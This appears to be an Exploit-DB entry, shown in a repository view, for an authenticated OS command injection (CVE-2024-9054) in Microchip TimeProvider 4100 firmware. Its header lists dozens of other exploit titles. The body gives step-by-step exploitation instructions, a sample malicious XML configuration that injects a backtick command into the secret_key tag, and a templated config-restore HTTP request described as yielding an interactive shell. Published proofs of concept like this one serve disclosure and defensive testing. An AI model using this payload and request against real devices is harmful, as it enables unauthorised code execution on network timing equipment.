60175c9963
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
175 lines
No EOL
3.4 KiB
Text
175 lines
No EOL
3.4 KiB
Text
# Exploit Title: Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
|
|
|
|
# Exploit Author: Armando Huesca Prida
|
|
|
|
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
|
|
|
|
# Date of Disclosure: 27/06/2024
|
|
|
|
# Date of CVE Publication: 4/10/2024
|
|
|
|
# Exploit Publication: 10/10/2024
|
|
|
|
# Vendor Homepage: https://www.microchip.com/
|
|
|
|
# Version: Firmware release 1.0 through 2.4.7
|
|
|
|
# Tested on: Firmware release 2.3.12
|
|
|
|
# CVE: CVE-2024-9054
|
|
|
|
# External References:
|
|
|
|
# URL: https://www.cve.org/cverecord?id=CVE-2024-9054
|
|
|
|
# URL: https://0xhuesca.com/2024/10/cve-2024-9054.html
|
|
|
|
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file
|
|
|
|
# URL: https://www.gruppotim.it/it/footer/red-team.html
|
|
|
|
|
|
|
|
|
|
|
|
# Vulnerability Description:
|
|
|
|
|
|
|
|
A Remote Code Execution (RCE) vulnerability exists in the "secret_key" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution.
|
|
|
|
|
|
|
|
|
|
|
|
# Exploitation Steps:
|
|
|
|
|
|
|
|
1- Perform login into the device's management web interface.
|
|
|
|
2- Download the device's configuration file.
|
|
|
|
3- Substitute the "secret_key" value with the malicious payload.
|
|
|
|
4- Save the new configuration file containing the OS command to be executed.
|
|
|
|
5- Restore and submit the new configuration.
|
|
|
|
6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload.
|
|
|
|
|
|
|
|
|
|
|
|
# Example of malicious XML config file:
|
|
|
|
|
|
|
|
<?xml version="1.0"?>
|
|
|
|
[...]
|
|
|
|
<security>
|
|
|
|
[...]
|
|
|
|
<server>
|
|
|
|
<ip>192.168.1.1</ip>
|
|
|
|
<secret_key>`ping 192.168.1.20`</secret_key>
|
|
|
|
[...]
|
|
|
|
</server>
|
|
|
|
[...]
|
|
|
|
</security>
|
|
|
|
[...]
|
|
|
|
|
|
|
|
# Proof of Concept - PoC:
|
|
|
|
|
|
|
|
Manually modifying the following request it's possible to obtain interactive shell on the vulnerable device. Below is provided the list of values to be updated on the Exploit - HTTP request:
|
|
|
|
- [session cookie]
|
|
|
|
- [XML configuration file containing the injection on "secret_key" tag]
|
|
|
|
- [Web account password in clear-text]
|
|
|
|
- [device IP]
|
|
|
|
|
|
|
|
|
|
|
|
# Exploit - Restore and submit config file HTTP Request:
|
|
|
|
|
|
|
|
POST /config_restore HTTP/1.1
|
|
|
|
Host: [device IP]
|
|
|
|
Cookie: ci_session=[session cookie]
|
|
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
|
|
|
|
Accept: */*
|
|
|
|
Accept-Language: en-US,en;q=0.5
|
|
|
|
Accept-Encoding: gzip, deflate, br
|
|
|
|
Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
|
|
|
|
Content-Length: 206640
|
|
|
|
Origin: https://[device IP]
|
|
|
|
Referer: https://[device IP]/configbackuprestore
|
|
|
|
Sec-Fetch-Dest: empty
|
|
|
|
Sec-Fetch-Mode: cors
|
|
|
|
Sec-Fetch-Site: same-origin
|
|
|
|
Te: trailers
|
|
|
|
Connection: keep-alive
|
|
|
|
|
|
|
|
-----------------------------182708909322642582691204887002
|
|
|
|
Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
|
|
|
|
Content-Type: text/plain
|
|
|
|
|
|
|
|
[XML configuration file containing the injection on "secret_key" tag]
|
|
|
|
-----------------------------182708909322642582691204887002
|
|
|
|
Content-Disposition: form-data; name="pword"
|
|
|
|
|
|
|
|
[Web account password in clear-text]
|
|
|
|
-----------------------------182708909322642582691204887002--
|
|
|
|
|
|
|
|
|
|
|
|
# End |